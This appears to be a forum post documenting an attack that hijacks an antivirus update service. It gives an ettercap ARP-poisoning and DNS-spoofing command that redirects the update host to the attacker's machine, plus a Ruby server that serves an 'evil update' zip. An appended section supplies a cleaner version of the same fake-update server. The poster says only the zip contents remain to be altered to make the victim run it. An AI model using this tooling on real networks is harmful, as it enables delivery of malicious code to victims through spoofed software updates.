Here is a quick update on what I have done so far... I was going to make a video, but I see no need... The client successfully downloads the modified zip file from my computer during the DNS spoof (screenshot of Wireshark). I just need to modify the zip package's contents to trigger execution...
sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //
First, the ettercap filter drops encryption for more plaintext (not sure if it's needed for this situation, but I like to use it).
dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]
sudo ruby exploit.rb
(It's something I put together in a few minutes, don't judge me ;-P)
require 'socket' # SERVER

server = TCPServer.open(80)
loop {
  client = server.accept
  # readpartial returns whatever has arrived instead of blocking for exactly 100 bytes
  print client.readpartial(4096) # should receive GET /minitri.flg
  # HTTP header lines end in CRLF; the empty line terminates the header block
  client.print("HTTP/1.1 200 OK\r\n" +
               "Content-Length: 1\r\n" +
               "Content-Type: text/plain\r\n" +
               "Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT\r\n" +
               "ETag: \"1-42ea9080\"\r\n" +
               "Accept-Ranges: bytes\r\n" +
               "Date: Sun, 15 May 2011 01:52:21 GMT\r\n" +
               "Connection: keep-alive\r\n" +
               "Cache-Control: public,must-revalidate,max-age=1800\r\n\r\n")
  client.print("\n") # the one-byte body promised by Content-Length
  print client.readpartial(4096) # should receive GET /update symnetc from client
  payload = File.binread('/home/bigmac/out.zip') # new evil update
  # Content-Length tells the keep-alive client where the zip body ends
  client.print("HTTP/1.1 200 OK\r\n" +
               "Content-Type: application/zip\r\n" +
               "Content-Length: #{payload.bytesize}\r\n" +
               "Last-Modified: Sun, 15 May 2011 21:16:04 GMT\r\n" +
               "ETag: W/\"15a1-4dd04294\"\r\n" +
               "Accept-Ranges: bytes\r\n" +
               "Date: Sun, 15 May 2011 20:50:18 GMT\r\n" +
               "Connection: keep-alive\r\n" +
               "Cache-Control: public,must-revalidate,max-age=240\r\n\r\n")
  # now send payload
  client.print(payload)
  client.close # Disconnect from the client
}
Wireshark screenshot of the zip file downloaded, 192.168.1.102 <---> 192.168.1.104:
img838.imageshack.us/i/screenshotwireshark.png
... I should post the zip file; I'm sure all that is needed is changing a few numbers around to trigger execution.
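As an added example (editor's code, not the poster's), here is a more robust version of the same fake-update responder. It reads each request's header block up to the blank line, routes on the request path, and frames every response with CRLF line endings and a Content-Length, so a keep-alive client knows where each body ends and a second request on the same connection is read correctly. The paths, the one-byte flag body and the zip bytes are constructed placeholders (the zip is just an empty end-of-central-directory record), not anything captured from the real update flow, and the port comes from an environment variable that is assumed here.

```ruby
require 'socket'
require 'stringio'
require 'time'

# Constructed sample content (placeholders): a one-byte flag file and a
# minimal, empty zip archive (end-of-central-directory record only).
FLAG_BODY = "\n".b.freeze
EMPTY_ZIP = ("PK\x05\x06" + "\x00" * 18).b.freeze

# Request path -> [content type, body]. Paths are assumed, not captured.
ROUTES = {
  '/minitri.flg' => ['text/plain', FLAG_BODY],
  '/update.zip'  => ['application/zip', EMPTY_ZIP],
}.freeze

# Build one HTTP/1.1 response: CRLF-terminated headers, a declared
# Content-Length, then the body.
def http_response(status, content_type, body)
  headers = [
    "HTTP/1.1 #{status}",
    "Content-Type: #{content_type}",
    "Content-Length: #{body.bytesize}",
    "Date: #{Time.now.httpdate}",
    'Connection: keep-alive',
  ]
  headers.join("\r\n") + "\r\n\r\n" + body
end

# Parse a request line such as "GET /minitri.flg HTTP/1.1\r\n".
# Returns [method, path], or nil if the line is malformed.
def parse_request_line(line)
  m = line.to_s.match(%r{\A([A-Z]+) (\S+) HTTP/1\.[01]\r?\n\z})
  m && [m[1], m[2]]
end

# Turn one request line into a full response, rejecting anything that is
# not a GET for a known path.
def handle_request(request_line, routes = ROUTES)
  method, path = parse_request_line(request_line)
  return http_response('400 Bad Request', 'text/plain', "bad request\n") unless method
  return http_response('405 Method Not Allowed', 'text/plain', "GET only\n") unless method == 'GET'
  type, body = routes[path.split('?').first]
  return http_response('404 Not Found', 'text/plain', "no such file\n") unless body
  http_response('200 OK', type, body)
end

# Consume one request (request line plus headers up to the blank line) and
# return the request line, or nil at end of stream.
def read_request(io)
  line = io.gets or return nil
  while (h = io.gets)
    break if h == "\r\n" || h == "\n"
  end
  line
end

# Accept connections and answer every request on each one until the client
# hangs up; the per-request Content-Length keeps the stream in sync.
def serve(port)
  server = TCPServer.new(port)
  loop do
    client = server.accept
    while (req = read_request(client))
      client.write(handle_request(req))
    end
    client.close
  end
end

# Assumed convention: FAKE_UPDATE_PORT=8080 ruby fake_update.rb
serve(Integer(ENV['FAKE_UPDATE_PORT'])) if ENV['FAKE_UPDATE_PORT']
```

The difference from the posted server is in the framing, not the idea: the request is consumed to its terminating blank line instead of a fixed 100 bytes, and each response declares its length, so the second GET on the keep-alive connection is read from the right offset and the client never waits for a body that is not coming.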